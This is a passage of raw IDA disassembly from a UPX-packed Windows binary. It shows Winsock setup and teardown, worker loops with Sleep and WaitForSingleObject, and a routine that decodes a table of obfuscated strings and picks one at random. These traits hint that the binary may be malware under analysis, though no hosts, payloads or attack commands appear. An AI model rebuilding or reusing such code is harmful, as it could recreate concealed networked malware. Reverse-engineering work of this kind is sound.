mov [esp+1Ch+var_4], 6
jz short loc_40C610
mov edx, [esi+0Ch]
push edx
mov ecx, eax
call sub_405470
jmp short loc_40C612
; ---------------------------------------------------------------------------
loc_40C610: ; CODE XREF: sub_40C480+181�j
xor eax, eax
loc_40C612: ; CODE XREF: sub_40C480+18E�j
push 154h
mov [esp+20h+var_4], edi
mov [esi+14h], eax
call sub_4191C1
add esp, 4
mov [esp+1Ch+var_10], eax
cmp eax, ebx
mov [esp+1Ch+var_4], 7
jz short loc_40C643
mov ecx, [esi+0Ch]
push ecx
mov ecx, eax
call sub_4055A0
jmp short loc_40C645
; ---------------------------------------------------------------------------
loc_40C643: ; CODE XREF: sub_40C480+1B4�j
xor eax, eax
loc_40C645: ; CODE XREF: sub_40C480+1C1�j
push 8
mov [esp+20h+var_4], edi
mov [esi+18h], eax
call sub_4191C1
push 14h
mov [esi+30h], eax
call sub_4191C1
add esp, 8
mov [esp+1Ch+var_10], eax
cmp eax, ebx
mov [esp+1Ch+var_4], 8
jz short loc_40C67D
mov edx, [esi+0Ch]
push edx
mov ecx, eax
call sub_409BA0
jmp short loc_40C67F
; ---------------------------------------------------------------------------
loc_40C67D: ; CODE XREF: sub_40C480+1EE�j
xor eax, eax
loc_40C67F: ; CODE XREF: sub_40C480+1FB�j
push 10h
mov [esp+20h+var_4], edi
mov [esi+34h], eax
call sub_4191C1
add esp, 4
mov [esp+1Ch+var_10], eax
cmp eax, ebx
mov [esp+1Ch+var_4], 9
jz short loc_40C6AD
mov ecx, [esi+0Ch]
push ecx
mov ecx, eax
call sub_4047B0
jmp short loc_40C6AF
; ---------------------------------------------------------------------------
loc_40C6AD: ; CODE XREF: sub_40C480+21E�j
xor eax, eax
loc_40C6AF: ; CODE XREF: sub_40C480+22B�j
push 28h
mov [esp+20h+var_4], edi
mov [esi+38h], eax
call sub_4191C1
add esp, 4
mov [esp+1Ch+var_10], eax
cmp eax, ebx
mov [esp+1Ch+var_4], 0Ah
jz short loc_40C6DD
mov edx, [esi+0Ch]
push edx
mov ecx, eax
call sub_4024F0
jmp short loc_40C6DF
; ---------------------------------------------------------------------------
loc_40C6DD: ; CODE XREF: sub_40C480+24E�j
xor eax, eax
loc_40C6DF: ; CODE XREF: sub_40C480+25B�j
push 42D8h
mov [esp+20h+var_4], edi
mov [esi+3Ch], eax
call sub_4191C1
add esp, 4
mov [esp+1Ch+var_10], eax
cmp eax, ebx
mov [esp+1Ch+var_4], 0Bh
jz short loc_40C710
mov ecx, [esi+0Ch]
push ecx
mov ecx, eax
call sub_4027A0
jmp short loc_40C712
; ---------------------------------------------------------------------------
loc_40C710: ; CODE XREF: sub_40C480+281�j
xor eax, eax
loc_40C712: ; CODE XREF: sub_40C480+28E�j
push 1Ch
mov [esp+20h+var_4], edi
mov [esi+28h], eax
call sub_4191C1
add esp, 4
cmp eax, ebx
pop edi
jz short loc_40C740
mov [eax+4], ebx
mov [eax+8], ebx
mov [eax+0Ch], ebx
mov [eax+10h], ebx
mov [eax+18h], ebx
mov dword ptr [eax+14h], 1
jmp short loc_40C742
; ---------------------------------------------------------------------------
loc_40C740: ; CODE XREF: sub_40C480+2A6�j
xor eax, eax
loc_40C742: ; CODE XREF: sub_40C480+2BE�j
push 100h
mov [esi+2Ch], eax
call sub_4191BC
push 80h
mov [esi+40h], eax
call sub_4191BC
add esp, 8
push 0Ch
push offset dword_4294B8
mov ecx, offset off_42AE60
mov [esi+44h], eax
call sub_406AE0
mov edx, [esi+40h]
loc_40C776: ; CODE XREF: sub_40C480+2FE�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
cmp cl, bl
jnz short loc_40C776
push 0Bh
push offset loc_4294C4
mov ecx, offset off_42AE60
call sub_406AE0
mov edx, [esi+44h]
loc_40C794: ; CODE XREF: sub_40C480+31C�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
cmp cl, bl
jnz short loc_40C794
mov ecx, [esp+18h+var_C]
mov eax, esi
pop esi
pop ebx
mov large fs:0, ecx
add esp, 10h
retn
sub_40C480 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C7C0 proc near ; CODE XREF: sub_40CCF0+4A�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset SEH_40C7C0
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 0Ch
mov eax, dword_42A290
push ebx
push esi
push edi
mov esi, ecx
mov [ebp+var_14], eax
mov eax, [esi+4Ch]
xor edi, edi
cmp eax, edi
mov [ebp+var_10], esp
mov [ebp+var_4], edi
jnz loc_40C92A
lea eax, [esi+50h]
push eax
push 101h
call dword_42423C ; WSAStartup
push edi
call sub_419875
push eax
call sub_419846
mov ecx, [ebp+arg_0]
add esp, 8
push ecx
mov ecx, [esi+4]
call sub_405940
mov ecx, [esi+10h]
call sub_40A2D0
mov ecx, [esi+1Ch]
call sub_405FB0
mov ecx, [esi+14h]
call sub_4054B0
mov edx, [esi+4]
mov ecx, [esi+18h]
push edx
call sub_4055E0
mov eax, [esi+1Ch]
mov ecx, [esi+4]
push esi
push eax
push ecx
mov ecx, [esi+28h]
call sub_4028F0
mov edx, [esi+10h]
mov eax, [esi+4]
mov ecx, [esi+8]
push edx
push eax
call sub_4075D0
mov ecx, [esi+8]
push ecx
mov ecx, [esi+20h]
call sub_408AC0
mov edx, [esi+30h]
mov eax, [esi+4]
mov [edx], eax
mov ecx, [esi+8]
call sub_407E20
mov ecx, [esi+30h]
mov [ecx+4], eax
mov edx, [esi+30h]
mov ecx, [esi+34h]
push edx
call sub_409A70
mov eax, [esi+4]
mov ecx, [esi+38h]
push eax
call sub_4046B0
mov ecx, [esi+4]
push ecx
mov ecx, [esi+3Ch]
call sub_402530
mov edx, [esi+4]
mov eax, [edx+6C4h]
mov ebx, 1
cmp eax, ebx
jg short loc_40C924
mov eax, [esi+20h]
mov ecx, [esi+24h]
push eax
mov [esi+48h], ebx
call sub_40AB90
push 124h
call sub_4191C1
mov ecx, eax
add esp, 4
mov [ebp+var_18], ecx
cmp ecx, edi
mov byte ptr [ebp+var_4], 2
jz short loc_40C8F6
mov edx, [esi+0Ch]
push edx
call sub_401CF0
mov edi, eax
loc_40C8F6: ; CODE XREF: sub_40C7C0+129�j
push 0Ah
push offset dword_4294D0
mov ecx, offset off_42AE60
mov byte ptr [ebp+var_4], 0
call sub_406AE0
push eax
mov eax, [esi+20h]
push eax
mov ecx, edi
call sub_401D30
mov ecx, [esi+2Ch]
push 0
push edi
call sub_410740
jmp short loc_40C927
; ---------------------------------------------------------------------------
loc_40C924: ; CODE XREF: sub_40C7C0+100�j
mov [esi+48h], edi
loc_40C927: ; CODE XREF: sub_40C7C0+162�j
mov [esi+4Ch], ebx
loc_40C92A: ; CODE XREF: sub_40C7C0+35�j
; DATA XREF: sub_40C945�o
mov ecx, [ebp+var_C]
mov large fs:0, ecx
mov ecx, [ebp+var_14]
call sub_4192B6
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 4
sub_40C7C0 endp
; =============== S U B R O U T I N E =======================================
sub_40C945 proc near ; DATA XREF: UPX0:0042686C�o
mov eax, offset loc_40C92A
retn
sub_40C945 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C950 proc near ; CODE XREF: sub_40CCF0+55�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset SEH_40C950
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 8
push ebx
push esi
mov esi, ecx
mov eax, [esi+4Ch]
test eax, eax
push edi
mov [ebp+var_10], esp
mov [ebp+var_4], 0
jz short loc_40C9CB
call sub_40BF40
test eax, eax
jz short loc_40C9CB
mov ecx, [esi+14h]
mov ebx, 1
push ebx
call sub_419070
mov edi, dword_42408C
push 3E8h
call edi ; Sleep
mov ecx, [esi+1Ch]
call sub_4062A0
mov ecx, esi
call sub_40BA20
test eax, eax
jnz short loc_40C9DC
mov eax, [esi+14h]
mov [eax+1Ch], ebx
loc_40C9BE: ; CODE XREF: sub_40C950+276�j
mov ecx, [esi+14h]
push 2BF20h
call sub_419020
loc_40C9CB: ; CODE XREF: sub_40C950+2F�j
; sub_40C950+38�j
; DATA XREF: ...
mov ecx, [ebp+var_C]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
loc_40C9DC: ; CODE XREF: sub_40C950+66�j
mov ecx, [esi+1Ch]
call sub_4061E0
mov ecx, [esi+18h]
push ebx
call sub_419070
push 3E8h
call edi ; Sleep
mov ecx, esi
call sub_40BA70
push ebx
mov ecx, esi
call sub_40BAE0
test eax, eax
jnz short loc_40CA40
mov eax, [esi+14h]
mov edi, dword_4240DC
mov [eax+1Ch], ebx
mov ecx, [esi+18h]
mov [ecx+2Ch], ebx
mov edx, [esi+14h]
mov eax, [edx+8]
push 0FFFFFFFFh
push eax
call edi ; WaitForSingleObject
mov ecx, [esi+18h]
mov edx, [ecx+8]
push 0FFFFFFFFh
push edx
call edi ; WaitForSingleObject
mov ecx, [ebp+var_C]
pop edi
pop esi
mov large fs:0, ecx
pop ebx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
loc_40CA40: ; CODE XREF: sub_40C950+B5�j
push 0
call sub_419875
push eax
call sub_419846
add esp, 8
mov ecx, esi
call sub_40B1E0
mov ecx, [esi+8]
call sub_407630
mov ecx, [esi+20h]
push ebx
call sub_419070
mov eax, [esi+48h]
test eax, eax
jz loc_40CB76
mov ecx, [esi+34h]
call sub_409A40
mov ecx, [esi+34h]
call sub_409C50
mov ecx, [esi+38h]
call sub_404800
mov ecx, [esi+28h]
push ebx
call sub_419070
mov ecx, [esi+3Ch]
push ebx
call sub_419070
mov ecx, [esi+24h]
push ebx
call sub_419070
mov ecx, [esi+2Ch]
call sub_40BF20
mov ebx, eax
xor edi, edi
loc_40CAB2: ; CODE XREF: sub_40C950+186�j
cmp edi, ebx
jge short loc_40CAD8
mov ecx, [esi+2Ch]
push edi
lea eax, [ebp+var_14]
push eax
call sub_408AD0
test eax, eax
jz short loc_40CAD5
mov ecx, [ebp+var_14]
test ecx, ecx
jz short loc_40CAD5
push 1
call sub_419070
loc_40CAD5: ; CODE XREF: sub_40C950+175�j
; sub_40C950+17C�j
inc edi
jmp short loc_40CAB2
; ---------------------------------------------------------------------------
loc_40CAD8: ; CODE XREF: sub_40C950+164�j
mov ecx, [esi+24h]
push 0
call sub_419020
xor edi, edi
loc_40CAE4: ; CODE XREF: sub_40C950+1B8�j
cmp edi, ebx
jge short loc_40CB0A
push edi
lea ecx, [ebp+var_14]
push ecx
mov ecx, [esi+2Ch]
call sub_408AD0
test eax, eax
jz short loc_40CB07
mov ecx, [ebp+var_14]
test ecx, ecx
jz short loc_40CB07
push 0
call sub_419020
loc_40CB07: ; CODE XREF: sub_40C950+1A7�j
; sub_40C950+1AE�j
inc edi
jmp short loc_40CAE4
; ---------------------------------------------------------------------------
loc_40CB0A: ; CODE XREF: sub_40C950+196�j
mov ecx, [esi+1Ch]
call sub_4061E0
mov eax, [esi+20h]
mov edi, 1
mov [eax+28h], edi
mov ecx, [esi+20h]
push 0
call sub_419020
mov ecx, [esi+38h]
call sub_404730
mov ecx, [esi+38h]
call sub_4046D0
mov ecx, [esi+38h]
call sub_404730
mov ecx, [esi+34h]
call sub_409A90
mov ecx, [esi+34h]
call sub_409B00
mov ecx, [esi+3Ch]
push 493E0h
call sub_419020
mov eax, [esi+28h]
mov [eax+23Ch], edi
mov ecx, [esi+28h]
push 2BF20h
call sub_419020
mov ebx, edi
jmp short loc_40CBAD
; ---------------------------------------------------------------------------
loc_40CB76: ; CODE XREF: sub_40C950+11D�j
mov edi, ebx
jmp short loc_40CB80
; ---------------------------------------------------------------------------
align 10h
loc_40CB80: ; CODE XREF: sub_40C950+228�j
; sub_40C950+24B�j
mov ecx, [esi+4]
cmp edi, [ecx+6C4h]
jge short loc_40CB9D
push edi
call sub_405C50
mov ecx, [esi+20h]
push eax
call sub_408E20
inc edi
jmp short loc_40CB80
; ---------------------------------------------------------------------------
loc_40CB9D: ; CODE XREF: sub_40C950+239�j
mov eax, [esi+20h]
mov [eax+28h], ebx
mov ecx, [esi+20h]
push 0
call sub_419020
loc_40CBAD: ; CODE XREF: sub_40C950+224�j
mov eax, [esi+18h]
mov [eax+2Ch], ebx
mov eax, [esi+14h]
mov [eax+1Ch], ebx
mov ecx, [esi+18h]
push 2BF20h
call sub_419020
jmp loc_40C9BE
sub_40C950 endp
; ---------------------------------------------------------------------------
mov eax, offset loc_40C9CB
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40CBE0 proc near ; CODE XREF: sub_40CCF0+63�p
; UPX0:0040CD83�p ...
push esi
mov esi, ecx
push edi
mov dword ptr [esi], offset off_424520
call dword_424238 ; WSACleanup
mov ecx, [esi+28h]
test ecx, ecx
jz short loc_40CBFD
mov eax, [ecx]
push 1
call dword ptr [eax]
loc_40CBFD: ; CODE XREF: sub_40CBE0+15�j
mov ecx, [esi+14h]
test ecx, ecx
jz short loc_40CC0A
mov edx, [ecx]
push 1
call dword ptr [edx]
loc_40CC0A: ; CODE XREF: sub_40CBE0+22�j
mov ecx, [esi+18h]
test ecx, ecx
jz short loc_40CC17
mov eax, [ecx]
push 1
call dword ptr [eax]
loc_40CC17: ; CODE XREF: sub_40CBE0+2F�j
mov edi, [esi+2Ch]
test edi, edi
jz short loc_40CC2E
mov ecx, edi
call sub_408720
push edi
call sub_41930D
add esp, 4
loc_40CC2E: ; CODE XREF: sub_40CBE0+3C�j
mov ecx, [esi+24h]
test ecx, ecx
jz short loc_40CC3B
mov edx, [ecx]
push 1
call dword ptr [edx]
loc_40CC3B: ; CODE XREF: sub_40CBE0+53�j
mov ecx, [esi+20h]
test ecx, ecx
jz short loc_40CC48
mov eax, [ecx]
push 1
call dword ptr [eax]
loc_40CC48: ; CODE XREF: sub_40CBE0+60�j
mov edi, [esi+38h]
test edi, edi
jz short loc_40CC5F
mov ecx, edi
call sub_404A20
push edi
call sub_41930D
add esp, 4
loc_40CC5F: ; CODE XREF: sub_40CBE0+6D�j
mov edi, [esi+34h]
test edi, edi
jz short loc_40CC76
mov ecx, edi
call sub_409D80
push edi
call sub_41930D
add esp, 4
loc_40CC76: ; CODE XREF: sub_40CBE0+84�j
mov ecx, [esi+30h]
push ecx
call sub_41930D
mov ecx, [esi+3Ch]
add esp, 4
test ecx, ecx
jz short loc_40CC8F
mov edx, [ecx]
push 1
call dword ptr [edx]
loc_40CC8F: ; CODE XREF: sub_40CBE0+A7�j
mov ecx, [esi+8]
test ecx, ecx
jz short loc_40CC9C
mov eax, [ecx]
push 1
call dword ptr [eax]
loc_40CC9C: ; CODE XREF: sub_40CBE0+B4�j
mov ecx, [esi+4]
test ecx, ecx
jz short loc_40CCA9
mov edx, [ecx]
push 1
call dword ptr [edx]
loc_40CCA9: ; CODE XREF: sub_40CBE0+C1�j
mov ecx, [esi+10h]
test ecx, ecx
jz short loc_40CCB6
mov eax, [ecx]
push 1
call dword ptr [eax]
loc_40CCB6: ; CODE XREF: sub_40CBE0+CE�j
mov edi, [esi+1Ch]
test edi, edi
jz short loc_40CCCD
mov ecx, edi
call sub_405EB0
push edi
call sub_41930D
add esp, 4
loc_40CCCD: ; CODE XREF: sub_40CBE0+DB�j
mov ecx, [esi+40h]
push ecx
call sub_4198AE
mov edx, [esi+44h]
push edx
call sub_4198AE
add esp, 8
pop edi
pop esi
retn
sub_40CBE0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CCF0 proc near ; CODE XREF: start-6569A�p
var_1F4 = byte ptr -1F4h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset SEH_40CCF0
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 1E8h
mov eax, dword_42A290
push ebx
push esi
push edi
xor ebx, ebx
lea ecx, [ebp+var_1F4]
mov [ebp+var_14], eax
mov [ebp+var_10], esp
mov [ebp+var_4], ebx
call sub_40C480
mov eax, [ebp+arg_8]
push eax
lea ecx, [ebp+var_1F4]
mov byte ptr [ebp+var_4], 1
call sub_40C7C0
lea ecx, [ebp+var_1F4]
call sub_40C950
lea ecx, [ebp+var_1F4]
mov byte ptr [ebp+var_4], bl
call sub_40CBE0
loc_40CD58: ; DATA XREF: sub_40CD75�o
mov ecx, [ebp+var_C]
mov large fs:0, ecx
mov ecx, [ebp+var_14]
xor eax, eax
call sub_4192B6
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 10h
sub_40CCF0 endp
; =============== S U B R O U T I N E =======================================
sub_40CD75 proc near ; DATA XREF: UPX0:00426914�o
mov eax, offset loc_40CD58
retn
sub_40CD75 endp
; ---------------------------------------------------------------------------
align 10h
loc_40CD80: ; DATA XREF: UPX0:off_424520�o
push esi
mov esi, ecx
call sub_40CBE0
test byte ptr [esp+8], 1
jz short loc_40CD98
push esi
call sub_41930D
add esp, 4
loc_40CD98: ; CODE XREF: UPX0:0040CD8D�j
mov eax, esi
pop esi
retn 4
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40CDA0 proc near ; CODE XREF: sub_407F40+43�p
arg_3C = byte ptr 40h
arg_7C = word ptr 80h
arg_7E = byte ptr 82h
arg_BC = byte ptr 0C0h
arg_FC = byte ptr 100h
arg_13C = byte ptr 140h
arg_17C = byte ptr 180h
arg_1BC = byte ptr 1C0h
arg_1FC = byte ptr 200h
arg_23C = byte ptr 240h
arg_27C = byte ptr 280h
arg_2BC = byte ptr 2C0h
arg_2FC = byte ptr 300h
arg_33C = byte ptr 340h
arg_37C = byte ptr 380h
arg_3BC = byte ptr 3C0h
arg_3FC = byte ptr 400h
arg_43C = byte ptr 440h
arg_47C = byte ptr 480h
arg_4BC = byte ptr 4C0h
arg_4FC = byte ptr 500h
arg_53C = byte ptr 540h
arg_57C = byte ptr 580h
arg_5BC = byte ptr 5C0h
arg_5FC = byte ptr 600h
arg_63C = byte ptr 640h
arg_67C = byte ptr 680h
arg_6BC = byte ptr 6C0h
arg_6FC = word ptr 700h
arg_6FE = byte ptr 702h
arg_73C = byte ptr 740h
arg_77C = byte ptr 780h
arg_7BC = byte ptr 7C0h
arg_FFC = dword ptr 1000h
arg_1004 = dword ptr 1008h
mov eax, 1004h
call sub_4192D0
mov eax, dword_42A290
push esi
mov esi, [esp+4+arg_1004]
test esi, esi
mov [esp+4+arg_FFC], eax
jnz short loc_40CDD8
xor eax, eax
pop esi
mov ecx, [esp+arg_FFC]
call sub_4192B6
add esp, 1004h
retn
; ---------------------------------------------------------------------------
loc_40CDD8: ; CODE XREF: sub_40CDA0+20�j
push 4
push offset dword_4296FC
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+4]
lea ecx, [ecx+0]
loc_40CDF0: ; CODE XREF: sub_40CDA0+58�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40CDF0
push 4
push offset dword_429700
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+4+arg_3C]
nop
loc_40CE10: ; CODE XREF: sub_40CDA0+78�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40CE10
mov cl, byte_42452A
mov ax, word_424528
push 7
mov [esp+8+arg_7E], cl
push offset dword_429704
mov ecx, offset off_42AE60
mov [esp+0Ch+arg_7C], ax
call sub_406AE0
lea edx, [esp+4+arg_BC]
lea ecx, [ecx+0]
loc_40CE50: ; CODE XREF: sub_40CDA0+B8�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40CE50
push 4
push offset dword_42970C
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+4+arg_FC]
loc_40CE72: ; CODE XREF: sub_40CDA0+DA�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40CE72
push 5
push offset dword_429710
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+4+arg_13C]
loc_40CE94: ; CODE XREF: sub_40CDA0+FC�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40CE94
push 5
push offset dword_429718
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+4+arg_17C]
loc_40CEB6: ; CODE XREF: sub_40CDA0+11E�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40CEB6
push 8
push offset dword_429720
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+4+arg_1BC]
loc_40CED8: ; CODE XREF: sub_40CDA0+140�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40CED8
push 9
push offset dword_429728
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+4+arg_1FC]
lea ebx, [ebx+0]
loc_40CF00: ; CODE XREF: sub_40CDA0+168�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40CF00
push 0Ah
push offset dword_429734
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+4+arg_23C]
loc_40CF22: ; CODE XREF: sub_40CDA0+18A�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40CF22
push 0Ah
push offset dword_429740
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+4+arg_27C]
loc_40CF44: ; CODE XREF: sub_40CDA0+1AC�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40CF44
push 5
push offset dword_42974C
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+4+arg_2BC]
loc_40CF66: ; CODE XREF: sub_40CDA0+1CE�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40CF66
push 8
push offset dword_429754
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+4+arg_2FC]
loc_40CF88: ; CODE XREF: sub_40CDA0+1F0�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40CF88
push 0Dh
push offset dword_42975C
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+4+arg_33C]
lea ebx, [ebx+0]
loc_40CFB0: ; CODE XREF: sub_40CDA0+218�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40CFB0
push 5
push offset dword_42976C
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+4+arg_37C]
loc_40CFD2: ; CODE XREF: sub_40CDA0+23A�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40CFD2
push 7
push offset loc_429774
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+4+arg_3BC]
loc_40CFF4: ; CODE XREF: sub_40CDA0+25C�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40CFF4
push 5
push offset loc_42977C
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+4+arg_3FC]
loc_40D016: ; CODE XREF: sub_40CDA0+27E�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40D016
push 6
push offset loc_429784
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+4+arg_43C]
loc_40D038: ; CODE XREF: sub_40CDA0+2A0�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40D038
push 0Fh
push offset loc_42978C
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+4+arg_47C]
lea ebx, [ebx+0]
loc_40D060: ; CODE XREF: sub_40CDA0+2C8�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40D060
push 6
push offset dword_42979C
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+4+arg_4BC]
loc_40D082: ; CODE XREF: sub_40CDA0+2EA�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40D082
push 7
push offset dword_4297A4
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+4+arg_4FC]
loc_40D0A4: ; CODE XREF: sub_40CDA0+30C�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40D0A4
push 7
push offset dword_4297AC
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+4+arg_53C]
loc_40D0C6: ; CODE XREF: sub_40CDA0+32E�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40D0C6
push 0Ah
push offset dword_4297B4
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+4+arg_57C]
loc_40D0E8: ; CODE XREF: sub_40CDA0+350�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40D0E8
push 7
push offset dword_4297C0
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+4+arg_5BC]
lea ebx, [ebx+0]
loc_40D110: ; CODE XREF: sub_40CDA0+378�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40D110
push 5
push offset dword_4297C8
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+4+arg_5FC]
loc_40D132: ; CODE XREF: sub_40CDA0+39A�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40D132
push 4
push offset dword_4297D0
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+4+arg_63C]
loc_40D154: ; CODE XREF: sub_40CDA0+3BC�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40D154
push 10h
push offset dword_4297D4
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+4+arg_67C]
loc_40D176: ; CODE XREF: sub_40CDA0+3DE�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40D176
push 0Dh
push offset dword_4297E4
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+4+arg_6BC]
loc_40D198: ; CODE XREF: sub_40CDA0+400�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40D198
mov dx, word_424524
mov al, byte_424526
push 5
push offset loc_4297F4
mov ecx, offset off_42AE60
mov [esp+0Ch+arg_6FC], dx
mov [esp+0Ch+arg_6FE], al
call sub_406AE0
lea edx, [esp+4+arg_73C]
loc_40D1D5: ; CODE XREF: sub_40CDA0+43D�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40D1D5
push 8
push offset loc_4297FC
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+4+arg_77C]
loc_40D1F7: ; CODE XREF: sub_40CDA0+45F�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40D1F7
push 4
push offset loc_429804
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esp+4+arg_7BC]
lea esp, [esp+0]
loc_40D220: ; CODE XREF: sub_40CDA0+488�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40D220
call sub_419853
and eax, 8000001Fh
jns short loc_40D23B
dec eax
or eax, 0FFFFFFE0h
inc eax
loc_40D23B: ; CODE XREF: sub_40CDA0+494�j
shl eax, 6
lea eax, [esp+eax+4]
mov edx, esi
sub edx, eax
loc_40D246: ; CODE XREF: sub_40CDA0+4AE�j
mov cl, [eax]
mov [eax+edx], cl
inc eax
test cl, cl
jnz short loc_40D246
mov ecx, [esp+4+arg_FFC]
mov eax, 1
pop esi
call sub_4192B6
add esp, 1004h
retn
sub_40CDA0 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40D270 proc near ; CODE XREF: sub_407F40+39�p
; sub_40A1E0+14�p
var_804 = byte ptr -804h
var_7E4 = byte ptr -7E4h
var_7C4 = byte ptr -7C4h
var_7A4 = byte ptr -7A4h
var_784 = byte ptr -784h
var_764 = byte ptr -764h
var_744 = byte ptr -744h
var_724 = byte ptr -724h
var_704 = byte ptr -704h
var_6E4 = byte ptr -6E4h
var_6C4 = byte ptr -6C4h
var_6A4 = byte ptr -6A4h
var_684 = byte ptr -684h
var_664 = byte ptr -664h
var_644 = byte ptr -644h
var_624 = byte ptr -624h
var_604 = byte ptr -604h
var_5E4 = byte ptr -5E4h
var_5C4 = byte ptr -5C4h
var_5A4 = byte ptr -5A4h
var_584 = byte ptr -584h
var_564 = byte ptr -564h
var_544 = byte ptr -544h
var_524 = byte ptr -524h
var_504 = byte ptr -504h
var_4E4 = byte ptr -4E4h
var_4C4 = byte ptr -4C4h
var_4A4 = byte ptr -4A4h
var_484 = byte ptr -484h
var_464 = byte ptr -464h
var_444 = byte ptr -444h
var_4 = dword ptr -4
arg_0 = dword ptr 4
sub esp, 804h
mov eax, dword_42A290
push esi
mov esi, [esp+808h+arg_0]
test esi, esi
mov [esp+808h+var_4], eax
jnz short loc_40D2A4
xor eax, eax
pop esi
mov ecx, [esp+804h+var_4]
call sub_4192B6
add esp, 804h
retn
